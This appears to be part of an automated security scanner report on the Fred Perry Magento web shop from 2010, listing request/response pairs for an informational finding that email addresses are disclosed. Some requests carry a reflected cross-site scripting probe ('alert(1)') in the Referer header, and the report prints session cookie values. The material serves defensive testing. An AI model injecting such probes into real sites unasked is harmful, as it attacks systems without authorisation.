GET /sales/order/history/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 302 Found
Date: Tue, 09 Nov 2010 16:20:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=57m2j361l4tslk62h8uvs0na85; expires=Tue, 09-Nov-2010 17:20:05 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://www.fredperry.com/customer/account/login/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


7. Email addresses disclosed
There are 13 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.fredperry.com/aboutus/careers/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /aboutus/careers/

Issue detail

The following email address was disclosed in the response:

Request

GET /aboutus/careers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=cgq0lrf3pfq3s1vteov0hpgkk3; expires=Tue, 09-Nov-2010 17:16:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Careers
...[SNIP]...
<a href="mailto:careers@fredperry.com">careers@fredperry.com</a>
...[SNIP]...
<a href="mailto:careers@fredperry.com">careers@fredperry.com</a>
...[SNIP]...

7.2. http://www.fredperry.com/customercare/deliverylate/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/deliverylate/

Issue detail

The following email address was disclosed in the response:

Request

GET /customercare/deliverylate/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gqo991dbglao1e34i6fhgjt434; expires=Tue, 09-Nov-2010 17:14:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Late De
...[SNIP]...
<a href="mailto:ecommerce@fredperry.com" class="standardlink">ecommerce@fredperry.com</a>
...[SNIP]...

7.3. http://www.fredperry.com/customercare/faq/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/faq/

Issue detail

The following email address was disclosed in the response:

Request

GET /customercare/faq/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=9ob37fjg76o97s0kphrvsosup2; expires=Tue, 09-Nov-2010 17:13:58 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Frequen
...[SNIP]...
<a href="mailto:ecommerce@fredperry.com">ecommerce@fredperry.com</a>
...[SNIP]...
<a href="mailto:ecommerce@fredperry.com">ecommerce@fredperry.com</a>
...[SNIP]...
<a href="mailto:ecommerce@fredperry.com">ecommerce@fredperry.com</a>
...[SNIP]...

7.4. http://www.fredperry.com/customercare/returns/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The following email address was disclosed in the response:

Request

GET /customercare/returns/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v6rbp3o6tgiot9u6dp0p22ctq4; expires=Tue, 09-Nov-2010 17:14:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Returns
...[SNIP]...
<a href="mailto:ecommerce@fredperry.com" style="color: #917746;">ecommerce@fredperry.com</a>
...[SNIP]...

7.5. http://www.fredperry.com/js/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /js/index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: must-revalidate
Last-modified: Thu, 20 May 2010 11:06:23 +0000
Expires: Wed, 09 Nov 2011 15:45:19 +0000
Content-Type: text/javascript
Content-Length: 399652

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype we
...[SNIP]...
agdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...

7.6. http://www.fredperry.com/shops/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /shops/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /shops/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:13:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qlde3d5egr5vu9mvfgqi54aji5; expires=Tue, 09-Nov-2010 17:13:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 68571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Our Sho
...[SNIP]...
<a href="mailto:brighton@fredperry.com" class="standardlink">brighton@fredperry.com</a>
...[SNIP]...
<a href="mailto:manchester@fredperry.com" class="standardlink">manchester@fredperry.com</a>
...[SNIP]...
<a href="mailto:newburgh@fredperry.com" class="standardlink">newburgh@fredperry.com</a>
...[SNIP]...
<a href="mailto:sevendials@fredperry.com" class="standardlink">sevendials@fredperry.com</a>
...[SNIP]...
<a href="mailto:spitalfields@fredperry.com" class="standardlink">spitalfields@fredperry.com</a>
...[SNIP]...
<a href="mailto:bluewater@fredperry.com" class="standardlink">bluewater@fredperry.com</a>
...[SNIP]...
<a href="mailto:bristol@fredperry.com" class="standardlink">bristol@fredperry.com</a>
...[SNIP]...
<a href="mailto:coventgarden@fredperry.com" class="standardlink">coventgarden@fredperry.com</a>
...[SNIP]...
<a href="mailto:glasgow@fredperry.com" class="standardlink">glasgow@fredperry.com</a>
...[SNIP]...
<a href="mailto:liverpool@fredperry.com" class="standardlink">liverpool@fredperry.com</a>
...[SNIP]...
<a href="mailto:nottingham@fredperry.com" class="standardlink">nottingham@fredperry.com</a>
...[SNIP]...
<a href="mailto:westfield@fredperry.com" class="standardlink">westfield@fredperry.com</a>
...[SNIP]...
<a href="mailto:info@fredperrytoronto.com" class="standardlink">info@fredperrytoronto.com</a>
...[SNIP]...
<a href="mailto:paristemple@fredperry.com" class="standardlink">paristemple@fredperry.com</a>
...[SNIP]...
<a href="mailto:parisrosiers@fredperry.com" class="standardlink">parisrosiers@fredperry.com</a>
...[SNIP]...
<a href="mailto:berlin@fredperry.com" class="standardlink">berlin@fredperry.com</a>
...[SNIP]...
<a href="mailto:cologne@fredperry.com" class="standardlink">cologne@fredperry.com</a>
...[SNIP]...
<a href="mailto:fp304@uibonline.com" class="standardlink">fp304@uibonline.com</a>
...[SNIP]...
<a href="mailto:fp107@uibonline.com" class="standardlink">fp107@uibonline.com</a>
...[SNIP]...
<a href="mailto:enquiry@global-atelier.com" class="standardlink">enquiry@global-atelier.com</a>
...[SNIP]...
<a href="mailto:fredperryamsterdam@hartenstraat.com" class="standardlink">fredperryamsterdam@hartenstraat.com</a>
...[SNIP]...
<a href="mailto:fredperry@hommeetfemme.ph" class="standardlink">fredperry@hommeetfemme.ph</a>
...[SNIP]...
<a href="mailto:fredperry@hommeetfemme.ph" class="standardlink">fredperry@hommeetfemme.ph</a>
...[SNIP]...
<a href="mailto:fredperry@hommeetfemme.ph" class="standardlink">fredperry@hommeetfemme.ph</a>
...[SNIP]...
<a href="mailto:fredperry@kixbox.com" class="standardlink">fredperry@kixbox.com</a>
...[SNIP]...
<a href="mailto:fredperryspb@kixbox.com" class="standardlink">fredperryspb@kixbox.com</a>
...[SNIP]...
<a href="mailto:info@amnesty.com.sg" class="standardlink">info@amnesty.com.sg</a>
...[SNIP]...
<a href="mailto:info@amnesty.com.sg" class="standardlink">info@amnesty.com.sg</a>
...[SNIP]...
<a href="mailto:info@amnesty.com.sg" class="standardlink">info@amnesty.com.sg</a>
...[SNIP]...
<a href="mailto:fredperry.ljubljana@nocom.si" class="standardlink">fredperry.ljubljana@nocom.si</a>
...[SNIP]...
<a href="mailto:fredperrylaurel.sthlm@gmail.com">fredperrylaurel.sthlm@gmail.com</a>
...[SNIP]...
<a href="mailto:FredPerryIstinye@bilsar.com" class="standardlink">FredPerryIstinye@bilsar.com</a>
...[SNIP]...
<a href="mailto:fp_dfc@eim.ae">fp_dfc@eim.ae</a>
...[SNIP]...
<a href="mailto:TDM.FredPerry@uranio.ae" class="standardlink">TDM.FredPerry@uranio.ae</a>
...[SNIP]...
<a href="mailto:newyorkwooster@fredperry.com" class="standardlink">newyorkwooster@fredperry.com</a>
...[SNIP]...

7.7. http://www.fredperry.com/skin/frontend/default/default/css/clears.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/clears.css

Issue detail

The following email address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/clears.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c6f-7ba-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 1978
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...

7.8. http://www.fredperry.com/skin/frontend/default/default/css/print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/print.css

Issue detail

The following email address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/print.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:15 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "1ff0c7b-3c3-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 963
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...

7.9. http://www.fredperry.com/skin/frontend/default/default/css/styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /skin/frontend/default/default/css/styles.css

Issue detail

The following email address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/styles.css HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.194CKOLO; path=/
Date: Tue, 09 Nov 2010 15:45:22 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 20 Jul 2009 14:59:34 GMT
ETag: "d10bde-6ed6-46f2462cdc180"
Accept-Ranges: bytes
Content-Length: 28374
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...

7.10. https://www.fredperry.com/js/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /js/index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Referer: https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: must-revalidate
Last-modified: Thu, 20 May 2010 11:06:23 +0000
Expires: Wed, 09 Nov 2011 18:36:25 +0000
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/javascript
Content-Length: 399652

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype we
...[SNIP]...
agdrop.js v1.8.1, Thu Jan 03 22:07:12 -0500 2008

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thro
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...

7.11. https://www.fredperry.com/skin/frontend/default/default/css/clears.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /skin/frontend/default/default/css/clears.css

Issue detail

The following email address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/clears.css HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Referer: https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:20 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bca-7ba-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 1978
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Content-Type: text/css

/**
* Magento
*
* NOTICE OF LICENSE
*
* This source file is subject to the Academic Free License (AFL 3.0)
* that is bundled with this package in the file LICENSE_AFL.txt.
* It is also availabl
...[SNIP]...
ide-web at this URL:
* http://opensource.org/licenses/afl-3.0.php
* If you did not receive a copy of the license and are unable to
* obtain it through the world-wide-web, please send an email
* to license@magentocommerce.com so we can send you a copy immediately.
*
* DISCLAIMER
*
* Do not edit or add to this file if you wish to upgrade Magento to newer
* versions in the future. If you wish to customize Magento for yo
...[SNIP]...

7.12. https://www.fredperry.com/skin/frontend/default/default/css/print.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fredperry.com
Path:   /skin/frontend/default/default/css/print.css

Issue detail

The following email address was disclosed in the response:

Request

GET /skin/frontend/default/default/css/print.css HTTP/1.1
Host: www.fredperry.com
Connection: keep-alive
Referer: https://www.fredperry.com/customer8c3dc%22-alert(1)-%2276794ee1910/account/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.194CKOLO; __utma=119066206.1815755339.1289339096.1289339096.1289349290.2; __utmc=119066206; __utmb=119066206.4.10.1289349290

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 18:36:18 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 09 Mar 2009 10:57:31 GMT
ETag: "d10bd6-3c3-464ad80457cc0"
Accept-Ranges: bytes
Content-Length: 963
